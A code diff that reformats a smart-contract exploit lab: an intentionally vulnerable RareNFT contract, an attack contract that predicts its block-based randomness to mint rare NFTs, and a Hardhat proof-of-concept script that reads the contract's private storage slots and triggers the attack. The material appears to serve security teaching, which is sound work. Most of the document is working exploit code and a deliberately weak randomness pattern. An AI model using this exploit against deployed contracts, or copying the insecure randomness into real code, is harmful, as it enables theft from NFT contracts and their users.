cleanup and prettier

Author: arbazkiraak

contracts/malicious/RareNFTAttack.sol

@@ -6,19 +6,21 @@ import "../vulnerable/RareNFT.sol";
 contract RareNFTAttack {
     uint256 public nonce;
     bytes public gas;
-    RareNFT claim= RareNFT(0x5FbDB2315678afecb367f032d93F642f64180aa3);
-    constructor() payable{
+    RareNFT claim = RareNFT(0x5FbDB2315678afecb367f032d93F642f64180aa3);
+
+    constructor() payable {
         require(msg.value >= 1 ether, "RareNFT: requires 1 ether");
-}
+    }
 
     function _randGenerator(uint256 _drawNum) internal returns (uint256) {
         require(_drawNum > 0, "RareNFT: drawNum must be greater than 0");
 
         bytes32 randHash = keccak256(
-            gas=abi.encodePacked(
+            gas = abi.encodePacked(
                 blockhash(block.number - 1),
                 block.timestamp,
-                block.coinbase, uint256(0x0000000000000000000000000000000000000000000000000000000001af08b9),
+                block.coinbase,
+                uint256(0x0000000000000000000000000000000000000000000000000000000001af08b9),
                 tx.gasprice,
                 tx.origin,
                 nonce,
@@ -30,12 +32,10 @@ contract RareNFTAttack {
         nonce++;
         return random;
     }
-    function attack(uint256 _nonce,uint256 _luckyVal) public{
-        nonce=_nonce;
-        uint256 ranndomhash=_randGenerator(0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff);
-        claim.mint{value:1 ether}(ranndomhash-_luckyVal);
 
+    function attack(uint256 _nonce, uint256 _luckyVal) public {
+        nonce = _nonce;
+        uint256 ranndomhash = _randGenerator(0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff);
+        claim.mint{value: 1 ether}(ranndomhash - _luckyVal);
     }
-
-
 }

contracts/vulnerable/RareNFT.sol

@@ -33,9 +33,9 @@ contract RareNFT is Ownable, ReentrancyGuard {
         emit NFTcontract(address(_nftContract));
     }
 
-    function _luckyValGenerator() internal view returns(uint256) {
-        uint256 num = uint256(keccak256(abi.encodePacked(block.difficulty,block.timestamp))) % 5;
-        if (num == 0){
+    function _luckyValGenerator() internal view returns (uint256) {
+        uint256 num = uint256(keccak256(abi.encodePacked(block.difficulty, block.timestamp))) % 5;
+        if (num == 0) {
             num++;
         }
         return num;
@@ -88,7 +88,7 @@ contract RareNFT is Ownable, ReentrancyGuard {
     function collect(uint256 id) external payable nonReentrant {
         require(!collected[msg.sender], "RareNFT: you have already collected");
         Token memory tk = tokenInfo[id];
-        require(nftContract.ownerOf(id) == msg.sender,"RareNFT: id doesn't belongs to you");
+        require(nftContract.ownerOf(id) == msg.sender, "RareNFT: id doesn't belongs to you");
         if (tk.rare) {
             payable(msg.sender).transfer(0.1 ether);
         }

pocs/7.js

@@ -1,3 +1,4 @@
+const { expect } = require("chai");
 const { ethers } = require("hardhat");
 
 const ONE_ETHER = ethers.utils.parseUnits("1", "ether");
@@ -6,32 +7,32 @@ async function deploy(deployer, attacker) {
     const Rare = await ethers.getContractFactory("RareNFT", deployer);
     const RareNFTAttack = await ethers.getContractFactory("RareNFTAttack", attacker);
 
-    const rare = await Rare.deploy({value:ONE_ETHER});
-    const attack = await RareNFTAttack.deploy({value:ONE_ETHER});
+    const rare = await Rare.deploy({ value: ONE_ETHER });
+    const attack = await RareNFTAttack.deploy({ value: ONE_ETHER });
 
-    return [rare,attack];
+    return [rare, attack];
 }
 
 async function main() {
-    let [deployer, attacker] = await ethers.getSigners();
-    let [rare,attack] = await deploy(deployer, attacker);
+    let [deployer, attacker, user] = await ethers.getSigners();
+    let [rare, attack] = await deploy(deployer, attacker);
     console.log("RareNFT contract :", rare.address);
     console.log("Attack contract :", attack.address);
 
-    let nonce=await ethers.provider.getStorageAt(rare.address,3);
-    let luckyVal=await ethers.provider.getStorageAt(rare.address,4);
+    let nonce = await ethers.provider.getStorageAt(rare.address, 3);
+    let luckyVal = await ethers.provider.getStorageAt(rare.address, 4);
 
-    await attack.connect(attacker).attack(nonce,luckyVal);
-    rare.tokenInfo(0).then(res =>
-        console.log("Attack mint:\n",res));
+    console.log("LuckyVal set by the contract is :", await ethers.BigNumber.from(luckyVal).toNumber());
 
+    let tx = await attack.connect(attacker).attack(nonce, luckyVal);
+    await expect(tx).to.emit(rare, "Minted").withArgs(0, attack.address);
 
-    await rare.connect(attacker).mint(1,{value:ONE_ETHER});
-    rare.tokenInfo(1).then(res =>
-        console.log("Normal mint:\n",res));
-
+    console.log("\nAttack minted NFT data :", await rare.tokenInfo(0));
 
+    let tx2 = await rare.connect(user).mint(1, { value: ONE_ETHER });
+    await expect(tx2).to.emit(rare, "Minted").withArgs(1, user.address);
 
+    console.log("\nUser minted NFT data :", await rare.tokenInfo(1));
 }
 
 main();